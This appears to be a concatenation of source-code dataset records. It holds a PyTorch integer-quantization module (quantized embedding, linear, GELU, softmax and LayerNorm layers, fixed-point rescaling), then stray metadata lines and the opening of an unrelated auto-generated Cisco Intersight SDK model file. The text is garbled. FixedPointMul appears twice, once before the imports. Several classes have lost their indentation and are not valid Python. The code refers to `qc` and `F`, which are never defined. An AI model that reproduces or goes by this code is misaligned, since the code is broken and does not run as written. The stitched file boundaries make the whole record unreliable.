class FixedPointMul(Function):
    """Integer fixed-point rescaling of a quantized activation.

    forward computes ``round(pre_act / z_scaling_factor)`` using a
    mantissa/exponent decomposition (batch_frexp) of the ratio between the
    input and output scales, optionally adds a residual (`identity`)
    rescaled the same way, and clamps to the signed `bit_num` range.
    backward rescales gradients by ``1 / z_scaling_factor``.
    """

    @staticmethod
    def forward(
        ctx,
        pre_act,
        pre_act_scaling_factor,
        bit_num,
        z_scaling_factor,
        identity=None,
        identity_scaling_factor=None,
    ):
        # Scaling factors are broadcast to (1, 1, C) unless already 3-D.
        if len(pre_act_scaling_factor.shape) == 3:
            reshape = lambda x: x  # noqa: E731
        else:
            reshape = lambda x: x.view(1, 1, -1)  # noqa: E731
        ctx.identity = identity

        n = 2 ** (bit_num - 1) - 1

        with torch.no_grad():
            pre_act_scaling_factor = reshape(pre_act_scaling_factor)
            if identity is not None:
                identity_scaling_factor = reshape(identity_scaling_factor)

            ctx.z_scaling_factor = z_scaling_factor

            # Integer representation of the input, then the scale ratio
            # expressed in double precision as m * 2**(-e).
            z_int = torch.round(pre_act / pre_act_scaling_factor)
            _A = pre_act_scaling_factor.type(torch.double)
            _B = (z_scaling_factor.type(torch.float)).type(torch.double)
            new_scale = _A / _B
            new_scale = reshape(new_scale)

            m, e = batch_frexp(new_scale)

            output = z_int.type(torch.double) * m.type(torch.double)
            output = torch.round(output / (2.0**e))

            if identity is not None:
                # needs addition of identity activation
                wx_int = torch.round(identity / identity_scaling_factor)

                _A = identity_scaling_factor.type(torch.double)
                _B = (z_scaling_factor.type(torch.float)).type(torch.double)
                new_scale = _A / _B
                new_scale = reshape(new_scale)

                m1, e1 = batch_frexp(new_scale)
                output1 = wx_int.type(torch.double) * m1.type(torch.double)
                output1 = torch.round(output1 / (2.0**e1))

                output = output1 + output

            return torch.clamp(output.type(torch.float), -n - 1, n)

    @staticmethod
    def backward(ctx, grad_output):

        identity_grad = None
        if ctx.identity is not None:
            identity_grad = grad_output.clone() / ctx.z_scaling_factor
        return (
            grad_output.clone() / ctx.z_scaling_factor,
            None,
            None,
            None,
            None,
            identity_grad,
            None,
        )
| 33.934848
| 105
| 0.603831
|
import decimal
import numpy as np
import torch
from torch import nn
from torch.autograd import Function
from ...utils import logging
logger = logging.get_logger(__name__)
class QuantEmbedding(qc.Module):
def __init__(
self,
num_embeddings,
embedding_dim,
padding_idx=None,
max_norm=None,
norm_type=2.0,
scale_grad_by_freq=False,
sparse=False,
_weight=None,
weight_bit=8,
momentum=0.95,
quant_mode=False,
):
super().__init__()
self.num_ = num_embeddings
self.dim = embedding_dim
self.padding_idx = padding_idx
self.max_norm = max_norm
self.norm_type = norm_type
self.scale_grad_by_freq = scale_grad_by_freq
self.sparse = sparse
self.weight = nn.Parameter(torch.zeros([num_embeddings, embedding_dim]))
self.register_buffer("weight_scaling_factor", torch.zeros(1))
self.register_buffer("weight_integer", torch.zeros_like(self.weight))
self.weight_bit = weight_bit
self.momentum = momentum
self.quant_mode = quant_mode
self.percentile_mode = False
self.weight_function = SymmetricQuantFunction.apply
def forward(self, x, positions=None, incremental_state=None):
if not self.quant_mode:
return (
F.embedding(
x,
self.weight,
self.padding_idx,
self.max_norm,
self.norm_type,
self.scale_grad_by_freq,
self.sparse,
),
None,
)
w = self.weight
w_transform = w.data.detach()
w_min = w_transform.min().expand(1)
w_max = w_transform.max().expand(1)
self.weight_scaling_factor = symmetric_linear_quantization_params(
self.weight_bit, w_min, w_max, False
)
self.weight_integer = self.weight_function(
self.weight, self.weight_bit, self.percentile_mode, self.weight_scaling_factor
)
emb_int = F.embedding(
x,
self.weight_integer,
self.padding_idx,
self.max_norm,
self.norm_type,
self.scale_grad_by_freq,
self.sparse,
)
return emb_int * self.weight_scaling_factor, self.weight_scaling_factor
class QuantAct(qc.Module):
def __init__(
self,
activation_bit,
act_range_momentum=0.95,
per_channel=False,
channel_len=None,
quant_mode=False,
):
super().__init__()
self.activation_bit = activation_bit
self.act_range_momentum = act_range_momentum
self.quant_mode = quant_mode
self.per_channel = per_channel
self.percentile = False
self.act_function = SymmetricQuantFunction.apply
if not self.per_channel:
self.register_buffer("x_min", torch.zeros(1))
self.register_buffer("x_max", torch.zeros(1))
self.register_buffer("act_scaling_factor", torch.zeros(1))
self.x_min -= 1e-5
self.x_max += 1e-5
else:
raise NotImplementedError("per-channel mode is not currently supported for activation.")
def __repr__(self):
return (
f"{self.__class__.__name__}(activation_bit={self.activation_bit}, "
f"quant_mode: {self.activation_bit}, Act_min: {self.x_min.item():.2f}, "
f"Act_max: {self.x_max.item():.2f})"
)
def forward(
self,
x,
pre_act_scaling_factor=None,
identity=None,
identity_scaling_factor=None,
specified_min=None,
specified_max=None,
):
x_act = x if identity is None else identity + x
if self.training:
assert not self.percentile, "percentile mode is not currently supported for activation."
assert (
not self.per_channel
), "per-channel mode is not currently supported for activation."
x_min = x_act.data.min()
x_max = x_act.data.max()
assert (
x_max.isnan().sum() == 0 and x_min.isnan().sum() == 0
), "NaN detected when computing min/max of the activation"
if self.x_min.min() > -1.1e-5 and self.x_max.max() < 1.1e-5:
self.x_min = self.x_min + x_min
self.x_max = self.x_max + x_max
elif self.act_range_momentum == -1:
self.x_min = torch.min(self.x_min, x_min)
self.x_max = torch.max(self.x_max, x_max)
else:
self.x_min = self.x_min * self.act_range_momentum + x_min * (
1 - self.act_range_momentum
)
self.x_max = self.x_max * self.act_range_momentum + x_max * (
1 - self.act_range_momentum
)
if not self.quant_mode:
return x_act, None
x_min = self.x_min if specified_min is None else specified_min
x_max = self.x_max if specified_max is None else specified_max
self.act_scaling_factor = symmetric_linear_quantization_params(
self.activation_bit, x_min, x_max, per_channel=self.per_channel
)
if pre_act_scaling_factor is None:
quant_act_int = self.act_function(
x, self.activation_bit, self.percentile, self.act_scaling_factor
)
else:
quant_act_int = FixedPointMul.apply(
x,
pre_act_scaling_factor,
self.activation_bit,
self.act_scaling_factor,
identity,
identity_scaling_factor,
)
correct_output_scale = self.act_scaling_factor.view(-1)
return quant_act_int * correct_output_scale, self.act_scaling_factor
class QuantLinear(qc.Module):
    """Quantization-aware drop-in replacement for `nn.Linear`.

    Weights (and bias) are symmetrically quantized with `SymmetricQuantFunction`;
    the input activation must already be quantized with a single global
    scaling factor.

    Args:
        in_features: size of each input sample.
        out_features: size of each output sample.
        bias: whether the layer has an additive bias.
        weight_bit: bit width for weight quantization.
        bias_bit: bit width for bias quantization.
        per_channel: use one weight scale per output channel.
        quant_mode: if False, behave exactly like `nn.Linear`.
    """

    def __init__(
        self,
        in_features,
        out_features,
        bias=True,
        weight_bit=8,
        bias_bit=32,
        per_channel=False,
        quant_mode=False,
    ):
        super().__init__()
        self.in_features = in_features
        self.out_features = out_features
        self.weight = nn.Parameter(torch.zeros([out_features, in_features]))
        self.register_buffer("weight_integer", torch.zeros_like(self.weight))
        self.register_buffer("fc_scaling_factor", torch.zeros(self.out_features))
        if bias:
            self.bias = nn.Parameter(torch.zeros(out_features))
            self.register_buffer("bias_integer", torch.zeros_like(self.bias))
        else:
            # Bug fix: the original left `self.bias` undefined when bias=False,
            # so both branches of forward() raised AttributeError.  Registering
            # None keeps `self.bias is not None` and F.linear(..., bias=None)
            # working.  (Assumes qc.Module exposes nn.Module's parameter
            # registration API — TODO confirm.)
            self.register_parameter("bias", None)
            self.bias_integer = None
        self.weight_bit = weight_bit
        self.quant_mode = quant_mode  # the original assigned this twice
        self.per_channel = per_channel
        self.bias_bit = bias_bit
        self.percentile_mode = False
        self.weight_function = SymmetricQuantFunction.apply

    def __repr__(self):
        s = super().__repr__()
        s = f"({s} weight_bit={self.weight_bit}, quant_mode={self.quant_mode})"
        return s

    def forward(self, x, prev_act_scaling_factor=None):
        """Apply the (quantized) linear transform.

        Args:
            x: input activation.
            prev_act_scaling_factor: global scaling factor of `x`, shape (1,);
                required when `quant_mode` is enabled.

        Returns:
            Tuple of (output, output scaling factor); the factor is None when
            quantization is disabled.
        """
        if not self.quant_mode:
            return F.linear(x, weight=self.weight, bias=self.bias), None
        assert prev_act_scaling_factor is not None and prev_act_scaling_factor.shape == (1,), (
            "Input activation to the QuantLinear layer should be globally (non-channel-wise) quantized. "
            "Please add a QuantAct layer with `per_channel = True` before this QuantAct layer"
        )
        w = self.weight
        w_transform = w.data.detach()
        if self.per_channel:
            w_min, _ = torch.min(w_transform, dim=1, out=None)
            w_max, _ = torch.max(w_transform, dim=1, out=None)
        else:
            w_min = w_transform.min().expand(1)
            w_max = w_transform.max().expand(1)
        self.fc_scaling_factor = symmetric_linear_quantization_params(
            self.weight_bit, w_min, w_max, self.per_channel
        )
        self.weight_integer = self.weight_function(
            self.weight, self.weight_bit, self.percentile_mode, self.fc_scaling_factor
        )
        # The bias is quantized with (weight scale * activation scale) so the
        # integer GEMM result needs only a single rescale at the end.
        bias_scaling_factor = self.fc_scaling_factor * prev_act_scaling_factor
        if self.bias is not None:
            self.bias_integer = self.weight_function(
                self.bias, self.bias_bit, False, bias_scaling_factor
            )
        prev_act_scaling_factor = prev_act_scaling_factor.view(1, -1)
        x_int = x / prev_act_scaling_factor
        return (
            F.linear(x_int, weight=self.weight_integer, bias=self.bias_integer)
            * bias_scaling_factor,
            bias_scaling_factor,
        )
class IntGELU(qc.Module):
    """Integer-only approximation of GELU (I-BERT style).

    erf() is approximated by a second-order polynomial evaluated entirely in
    integer arithmetic, so the activation can run on integer-only hardware.

    Args:
        quant_mode: if False, fall back to `nn.GELU`.
        force_dequant: "nonlinear" or "gelu" forces the float fallback.
    """

    def __init__(self, quant_mode=True, force_dequant="none"):
        super().__init__()
        self.quant_mode = quant_mode
        if force_dequant in ["nonlinear", "gelu"]:
            logger.info("Force dequantize gelu")
            self.quant_mode = False
        if not self.quant_mode:
            self.activation_fn = nn.GELU()
        self.k = 1.4142  # sqrt(2): GELU(x) = x/2 * (1 + erf(x / sqrt(2)))
        self.const = 14  # fractional bits used by the integer kernel
        # a, b, c of sign(x) * (a*(|x| + b)**2 + c) ~= erf(x); c is pre-divided
        # by a so the polynomial can be evaluated with the scale folded out.
        self.coeff = [-0.2888, -1.769, 1]
        self.coeff[2] /= self.coeff[0]

    def int_erf(self, x_int, scaling_factor):
        # Integer evaluation of sign(x) * ((|x| + b)**2 + c); |x| is clamped at
        # -b so the polynomial is only used inside its valid range.
        b_int = torch.floor(self.coeff[1] / scaling_factor)
        c_int = torch.floor(self.coeff[2] / scaling_factor**2)
        sign = torch.sign(x_int)
        abs_int = torch.min(torch.abs(x_int), -b_int)
        y_int = sign * ((abs_int + b_int) ** 2 + c_int)
        scaling_factor = scaling_factor**2 * self.coeff[0]
        # Shift down by `const` bits (straight-through floor) to keep the
        # integers in range; the scale absorbs the shift.
        y_int = floor_ste.apply(y_int / 2**self.const)
        scaling_factor = scaling_factor * 2**self.const
        return y_int, scaling_factor

    def forward(self, x, scaling_factor=None):
        """Apply (integer) GELU; returns (output, output scaling factor)."""
        if not self.quant_mode:
            return self.activation_fn(x), None
        x_int = x / scaling_factor
        sigmoid_int, sigmoid_scaling_factor = self.int_erf(x_int, scaling_factor / self.k)
        # Integer representation of the "+1" term in (erf(.) + 1).
        shift_int = 1.0 // sigmoid_scaling_factor
        # x * (erf(x / sqrt(2)) + 1) in integer arithmetic; the final /2 of
        # GELU is folded into the scaling factor below.
        x_int = x_int * (sigmoid_int + shift_int)
        scaling_factor = scaling_factor * sigmoid_scaling_factor / 2
        return x_int * scaling_factor, scaling_factor
class IntSoftmax(qc.Module):
    """Integer-only softmax (I-BERT style).

    exp() is approximated by range reduction x = q * (-ln 2) + r followed by a
    second-order integer polynomial for exp(r), so the whole softmax can be
    computed in integer arithmetic.

    Args:
        output_bit: bit width of the softmax output.
        quant_mode: if False, fall back to `F.softmax`.
        force_dequant: "nonlinear" or "softmax" forces the float fallback.
    """

    def __init__(self, output_bit, quant_mode=False, force_dequant="none"):
        super().__init__()
        self.output_bit = output_bit
        self.max_bit = 32
        self.quant_mode = quant_mode
        if force_dequant in ["nonlinear", "softmax"]:
            logger.info("Force dequantize softmax")
            self.quant_mode = False
        # 16-bit requantization of the intermediate exponentials.
        self.act = QuantAct(16, quant_mode=self.quant_mode)
        self.x0 = -0.6931  # -ln(2), the range-reduction step
        self.const = 30  # fractional bits for the integer exp
        # a, b, c of a*(x + b)*x + c ~= exp(x); b and c are pre-divided by a.
        self.coef = [0.35815147, 0.96963238, 1.0]
        self.coef[1] /= self.coef[0]
        self.coef[2] /= self.coef[0]

    def int_polynomial(self, x_int, scaling_factor):
        # Integer evaluation of (x + b) * x + c with the coefficient scale
        # folded into the returned scaling factor.
        with torch.no_grad():
            b_int = torch.floor(self.coef[1] / scaling_factor)
            c_int = torch.floor(self.coef[2] / scaling_factor**2)
        z = (x_int + b_int) * x_int + c_int
        scaling_factor = self.coef[0] * scaling_factor**2
        return z, scaling_factor

    def int_exp(self, x_int, scaling_factor):
        # exp(x) = 2**(-q) * exp(r) with x = q * (-ln 2) + r.
        with torch.no_grad():
            x0_int = torch.floor(self.x0 / scaling_factor)
        # Clamp so q never exceeds `const` (keeps 2**(const - q) non-negative).
        x_int = torch.max(x_int, self.const * x0_int)
        q = floor_ste.apply(x_int / x0_int)
        r = x_int - x0_int * q
        exp_int, exp_scaling_factor = self.int_polynomial(r, scaling_factor)
        exp_int = torch.clamp(floor_ste.apply(exp_int * 2 ** (self.const - q)), min=0)
        scaling_factor = exp_scaling_factor / 2**self.const
        return exp_int, scaling_factor

    def forward(self, x, scaling_factor):
        """Softmax over the last axis; returns (output, output scaling factor)."""
        if not self.quant_mode:
            return F.softmax(x, dim=-1), None
        x_int = x / scaling_factor
        # Subtract the row max for numerical stability (standard softmax trick).
        x_int_max, _ = x_int.max(dim=-1, keepdim=True)
        x_int = x_int - x_int_max
        exp_int, exp_scaling_factor = self.int_exp(x_int, scaling_factor)
        # Requantize the exponentials to 16 bits before normalizing.
        exp, exp_scaling_factor = self.act(exp_int, exp_scaling_factor)
        exp_int = exp / exp_scaling_factor
        exp_int_sum = exp_int.sum(dim=-1, keepdim=True)
        # Fixed-point reciprocal of the partition sum.
        factor = floor_ste.apply(2**self.max_bit / exp_int_sum)
        exp_int = floor_ste.apply(exp_int * factor / 2 ** (self.max_bit - self.output_bit))
        scaling_factor = 1 / 2**self.output_bit
        return exp_int * scaling_factor, scaling_factor
class IntLayerNorm(qc.Module):
    """Integer-only LayerNorm (I-BERT style), normalizing over axis 2.

    The variance is accumulated in integer arithmetic; a dynamically grown
    right-shift (`self.shift`) keeps the sum of squares below 2**max_bit.

    Args:
        normalized_shape: shape of the affine weight/bias parameters.
        eps: numerical-stability constant (used on the float path only).
        output_bit: bit width of the normalized output.
        quant_mode: if False, compute ordinary floating-point LayerNorm.
        force_dequant: "nonlinear" or "layernorm" forces the float fallback.
    """

    def __init__(self, normalized_shape, eps, output_bit=8, quant_mode=False, force_dequant="none"):
        super().__init__()
        self.normalized_shape = normalized_shape
        self.eps = eps
        self.weight = nn.Parameter(torch.zeros(normalized_shape))
        self.bias = nn.Parameter(torch.zeros(normalized_shape))
        self.quant_mode = quant_mode
        if force_dequant in ["nonlinear", "layernorm"]:
            logger.info("Force dequantize layernorm")
            self.quant_mode = False
        # Dynamic right-shift that keeps the integer variance in range.
        self.register_buffer("shift", torch.zeros(1))
        self.output_bit = output_bit
        self.max_bit = 32
        self.dim_sqrt = None  # sqrt(feature dim); lazily set in forward()
        self.activation = QuantAct(self.output_bit, quant_mode=self.quant_mode)

    def set_shift(self, y_int):
        """Grow `self.shift` until the integer variance fits below 2**max_bit."""
        with torch.no_grad():
            y_sq_int = y_int**2
            var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
            shift = (torch.log2(torch.sqrt(var_int / 2**self.max_bit)).ceil()).max()
            shift_old = self.shift
            # The shift only ever grows, so past batches stay representable.
            self.shift = torch.max(self.shift, shift)
            logger.info(f"Dynamic shift adjustment: {int(shift_old)} to {int(self.shift)}")

    def overflow_fallback(self, y_int):
        """Recompute the integer variance after enlarging the shift; called when
        an overflow is detected during training."""
        self.set_shift(y_int)
        y_int_shifted = floor_ste.apply(y_int / 2**self.shift)
        y_sq_int = y_int_shifted**2
        var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
        return var_int

    def forward(self, x, scaling_factor=None):
        """Normalize `x` over axis 2; returns (output, output scaling factor)."""
        if not self.quant_mode:
            # Plain floating-point LayerNorm with affine transform.
            mean = x.mean(axis=2, keepdim=True)
            y = x - mean
            var = torch.mean(y**2, axis=2, keepdim=True)
            x = y / torch.sqrt(self.eps + var)
            x = x * self.weight + self.bias
            return x, None
        # Lazily cache sqrt(n), n being the size of the normalized axis.
        if self.dim_sqrt is None:
            n = torch.tensor(x.shape[2], dtype=torch.float)
            self.dim_sqrt = torch.sqrt(n).to(x.device)
        x_int = x / scaling_factor
        mean_int = round_ste.apply(x_int.mean(axis=2, keepdim=True))
        y_int = x_int - mean_int
        y_int_shifted = floor_ste.apply(y_int / 2**self.shift)
        y_sq_int = y_int_shifted**2
        var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
        # During training, widen the shift on overflow and recompute.
        if self.training:
            if var_int.max() >= 2**self.max_bit:
                var_int = self.overflow_fallback(y_int)
                assert var_int.max() < 2**self.max_bit + 0.1, (
                    "Error detected in overflow handling: "
                    "`var_int` exceeds `self.max_bit` (the maximum possible bit width)"
                )
        # Integer std (undo the shift), then normalize through a fixed-point
        # reciprocal: factor = 2**31 / std.
        std_int = floor_ste.apply(torch.sqrt(var_int)) * 2**self.shift
        factor = floor_ste.apply(2**31 / std_int)
        y_int = floor_ste.apply(y_int * factor / 2)
        scaling_factor = self.dim_sqrt / 2**30
        # Fold the affine bias into the integer domain as bias / weight, since
        # the weight is applied through the scaling factor below.
        bias = self.bias.data.detach() / (self.weight.data.detach())
        bias_int = floor_ste.apply(bias / scaling_factor)
        y_int = y_int + bias_int
        scaling_factor = scaling_factor * self.weight
        x = y_int * scaling_factor
        return x, scaling_factor
def get_percentile_min_max(input, lower_percentile, upper_percentile, output_tensor=False):
    """Return the (lower, upper) percentile bounds of a 1-D tensor.

    Args:
        input: 1-D tensor of values.
        lower_percentile: lower percentile in [0, 100]; 0 yields a zero bound.
        upper_percentile: upper percentile in [0, 100].
        output_tensor: return 0-dim tensors instead of Python floats.

    Returns:
        Tuple (lower_bound, upper_bound).
    """
    count = input.shape[0]
    k_upper = round(count * upper_percentile * 0.01)
    upper_bound = torch.kthvalue(input, k=k_upper).values
    if lower_percentile == 0:
        lower_bound = upper_bound * 0
    else:
        # The k-th smallest of the negated values is the k-th largest of the
        # originals, which gives the lower tail cutoff.
        k_lower = round(count * (1 - lower_percentile * 0.01))
        lower_bound = -torch.kthvalue(-input, k=k_lower).values
    if output_tensor:
        return lower_bound, upper_bound
    return lower_bound.item(), upper_bound.item()
def linear_quantize(input, scale, zero_point, inplace=False):
    """Quantize a tensor: round(input / scale + zero_point).

    `scale` and `zero_point` are broadcast along the leading dimension
    (per-channel for 4-D conv weights, per-row for 2-D linear weights,
    flat otherwise).

    Args:
        input: tensor to quantize.
        scale: quantization scale(s).
        zero_point: quantization offset(s).
        inplace: mutate `input` instead of allocating a new tensor.

    Returns:
        The quantized tensor (the same object when `inplace` is True).
    """
    ndim = input.dim()
    if ndim == 4:
        view_shape = (-1, 1, 1, 1)
    elif ndim == 2:
        view_shape = (-1, 1)
    else:
        view_shape = (-1,)
    scale = scale.view(view_shape)
    zero_point = zero_point.view(view_shape)
    if inplace:
        input.mul_(1.0 / scale).add_(zero_point).round_()
        return input
    return torch.round(1.0 / scale * input + zero_point)
def symmetric_linear_quantization_params(
    num_bits, saturation_min, saturation_max, per_channel=False
):
    """Compute the scale for symmetric `num_bits` linear quantization.

    The scale is max(|saturation_min|, |saturation_max|) / (2**(num_bits-1) - 1),
    clamped away from zero for numerical safety.

    Args:
        num_bits: quantization bit width.
        saturation_min: tensor of minimum values (per channel or global).
        saturation_max: tensor of maximum values.
        per_channel: compute one scale per channel (row-wise max of the
            absolute bounds) instead of a single global scale.

    Returns:
        Tensor of scaling factor(s); gradients are detached via no_grad.
    """
    with torch.no_grad():
        n = 2 ** (num_bits - 1) - 1
        if per_channel:
            abs_bounds = torch.stack([saturation_min.abs(), saturation_max.abs()], dim=1)
            scale, _ = torch.max(abs_bounds, dim=1)
        else:
            scale = max(saturation_min.abs(), saturation_max.abs())
        # Guard against an all-zero range producing a zero scale.
        scale = torch.clamp(scale, min=1e-8) / n
    return scale
class SymmetricQuantFunction(Function):
    """Autograd function for symmetric linear quantization with a
    straight-through gradient estimator."""

    @staticmethod
    def forward(ctx, x, k, percentile_mode, scale):
        """Quantize `x` to `k`-bit signed integers using `scale`.

        `percentile_mode` is accepted for interface compatibility but is not
        used in this implementation.
        """
        zero_point = torch.tensor(0.0).to(scale.device)
        n = 2 ** (k - 1) - 1
        new_quant_x = linear_quantize(x, scale, zero_point, inplace=False)
        # NOTE(review): the clamp range is [-n, n - 1], i.e. asymmetric on the
        # positive side — confirm this is intentional rather than [-n, n].
        new_quant_x = torch.clamp(new_quant_x, -n, n - 1)
        ctx.scale = scale
        return new_quant_x

    @staticmethod
    def backward(ctx, grad_output):
        # Straight-through estimator: treat round() as the identity and only
        # undo the scale applied in forward.
        scale = ctx.scale
        if len(grad_output.shape) == 4:
            scale = scale.view(-1, 1, 1, 1)
        elif len(grad_output.shape) == 2:
            scale = scale.view(-1, 1)
        else:
            scale = scale.view(-1)
        # NOTE(review): five gradients are returned for four forward inputs;
        # autograd tolerates trailing extra Nones, but this looks like a
        # leftover — confirm against the upstream implementation.
        return grad_output.clone() / scale, None, None, None, None
class floor_ste(Function):
    """`torch.floor` with a straight-through gradient estimator: the forward
    pass floors, the backward pass behaves like the identity."""

    @staticmethod
    def forward(ctx, x):
        # Hard floor in the forward direction.
        return x.floor()

    @staticmethod
    def backward(ctx, grad_output):
        # STE: pretend floor() is differentiable with gradient 1.
        return grad_output.clone()
class round_ste(Function):
    """`torch.round` with a straight-through gradient estimator: the forward
    pass rounds, the backward pass behaves like the identity."""

    @staticmethod
    def forward(ctx, x):
        # Hard round in the forward direction.
        return x.round()

    @staticmethod
    def backward(ctx, grad_output):
        # STE: pretend round() is differentiable with gradient 1.
        return grad_output.clone()
def batch_frexp(inputs, max_bit=31):
    """Decompose every element of `inputs` into an integer mantissa and a
    right-shift exponent: x ~= mantissa / 2**exponent.

    Uses `np.frexp` (x = m * 2**e with 0.5 <= |m| < 1) and scales the mantissa
    to a `max_bit` integer with decimal round-half-up, so integer hardware can
    reproduce the multiplication exactly.

    Args:
        inputs: tensor of values to decompose.
        max_bit: bit width of the integer mantissa.

    Returns:
        Tuple (mantissas, exponents) of tensors shaped like `inputs`.
    """
    original_shape = inputs.size()
    flat = inputs.view(-1)
    mantissas, exponents = np.frexp(flat.cpu().numpy())
    # Round half-up (not banker's rounding) when scaling each mantissa to an
    # integer, matching the reference integer kernels.
    quantized = np.array(
        [
            int(
                decimal.Decimal(m * (2**max_bit)).quantize(
                    decimal.Decimal("1"), rounding=decimal.ROUND_HALF_UP
                )
            )
            for m in mantissas
        ]
    )
    exponents = float(max_bit) - exponents
    return (
        torch.from_numpy(quantized).to(flat.device).view(original_shape),
        torch.from_numpy(exponents).to(flat.device).view(original_shape),
    )
class FixedPointMul(Function):
    """Fixed-point requantization: rescale an integer tensor from its input
    scaling factor to a target scaling factor using only integer arithmetic.

    The ratio of scaling factors is decomposed by `batch_frexp` into an
    integer mantissa `m` and exponent `e`, so x * (S_in / S_out) becomes
    round(x * m / 2**e).  A residual (`identity`) branch can be fused in by
    rescaling it the same way and adding.
    """

    @staticmethod
    def forward(
        ctx,
        pre_act,
        pre_act_scaling_factor,
        bit_num,
        z_scaling_factor,
        identity=None,
        identity_scaling_factor=None,
    ):
        """Rescale `pre_act` (optionally fused with `identity`) into the
        `z_scaling_factor` domain, clamped to `bit_num` signed bits."""
        # Scaling factors arrive either already 3-D or flat; normalize the
        # flat case to (1, 1, C) for broadcasting.
        if len(pre_act_scaling_factor.shape) == 3:
            reshape = lambda x: x  # noqa: E731
        else:
            reshape = lambda x: x.view(1, 1, -1)  # noqa: E731
        ctx.identity = identity
        n = 2 ** (bit_num - 1) - 1
        with torch.no_grad():
            pre_act_scaling_factor = reshape(pre_act_scaling_factor)
            if identity is not None:
                identity_scaling_factor = reshape(identity_scaling_factor)
            ctx.z_scaling_factor = z_scaling_factor
            # Integer representation of the input activation.
            z_int = torch.round(pre_act / pre_act_scaling_factor)
            # Compute the rescale ratio S_in / S_out in double precision to
            # minimize rounding error before the frexp decomposition.
            _A = pre_act_scaling_factor.type(torch.double)
            _B = (z_scaling_factor.type(torch.float)).type(torch.double)
            new_scale = _A / _B
            new_scale = reshape(new_scale)
            # x * new_scale ~= round(x * m / 2**e)
            m, e = batch_frexp(new_scale)
            output = z_int.type(torch.double) * m.type(torch.double)
            output = torch.round(output / (2.0**e))
            if identity is not None:
                # Rescale the residual branch the same way, then fuse by adding.
                wx_int = torch.round(identity / identity_scaling_factor)
                _A = identity_scaling_factor.type(torch.double)
                _B = (z_scaling_factor.type(torch.float)).type(torch.double)
                new_scale = _A / _B
                new_scale = reshape(new_scale)
                m1, e1 = batch_frexp(new_scale)
                output1 = wx_int.type(torch.double) * m1.type(torch.double)
                output1 = torch.round(output1 / (2.0**e1))
                output = output1 + output
            return torch.clamp(output.type(torch.float), -n - 1, n)

    @staticmethod
    def backward(ctx, grad_output):
        """Straight-through gradient, undoing the output scaling factor for
        both the main and (if present) the identity branch."""
        identity_grad = None
        if ctx.identity is not None:
            identity_grad = grad_output.clone() / ctx.z_scaling_factor
        # NOTE(review): seven gradients are returned for six forward inputs;
        # autograd tolerates trailing extra Nones, but confirm against the
        # upstream implementation.
        return (
            grad_output.clone() / ctx.z_scaling_factor,
            None,
            None,
            None,
            None,
            identity_grad,
            None,
        )
| true
| true
|
f71918cfc24775f026b1e9e604deca5c1ed4179d
| 18,802
|
py
|
Python
|
intersight/model/fabric_transceiver_role.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 5
|
2021-12-16T15:13:32.000Z
|
2022-03-29T16:09:54.000Z
|
intersight/model/fabric_transceiver_role.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 4
|
2022-01-25T19:05:51.000Z
|
2022-03-29T20:18:37.000Z
|
intersight/model/fabric_transceiver_role.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 2
|
2020-07-07T15:01:08.000Z
|
2022-01-31T04:27:35.000Z
|
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. The Intersight OpenAPI document defines the complete set of properties that are returned in the HTTP response. From that perspective, a client can expect that no additional properties are returned, unless these properties are explicitly defined in the OpenAPI document. However, when a client uses an older version of the Intersight OpenAPI document, the server may send additional properties because the software is more recent than the client. In that case, the client may receive properties that it does not know about. Some generated SDKs perform a strict validation of the HTTP response body against the OpenAPI document. # noqa: E501
The version of the OpenAPI document: 1.0.9-4950
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from intersight.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
    """Resolve the intersight model classes this module references.

    Imports are deferred to call time and published through ``globals()`` to
    avoid circular imports between the generated intersight models.
    """
    from intersight.model.display_names import DisplayNames
    from intersight.model.fabric_appliance_role import FabricApplianceRole
    from intersight.model.fabric_fcoe_uplink_role import FabricFcoeUplinkRole
    from intersight.model.fabric_port_policy_relationship import FabricPortPolicyRelationship
    from intersight.model.fabric_port_role import FabricPortRole
    from intersight.model.fabric_transceiver_role_all_of import FabricTransceiverRoleAllOf
    from intersight.model.fabric_uplink_role import FabricUplinkRole
    from intersight.model.mo_base_mo_relationship import MoBaseMoRelationship
    from intersight.model.mo_tag import MoTag
    from intersight.model.mo_version_context import MoVersionContext

    globals().update(
        DisplayNames=DisplayNames,
        FabricApplianceRole=FabricApplianceRole,
        FabricFcoeUplinkRole=FabricFcoeUplinkRole,
        FabricPortPolicyRelationship=FabricPortPolicyRelationship,
        FabricPortRole=FabricPortRole,
        FabricTransceiverRoleAllOf=FabricTransceiverRoleAllOf,
        FabricUplinkRole=FabricUplinkRole,
        MoBaseMoRelationship=MoBaseMoRelationship,
        MoTag=MoTag,
        MoVersionContext=MoVersionContext,
    )
class FabricTransceiverRole(ModelComposed):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
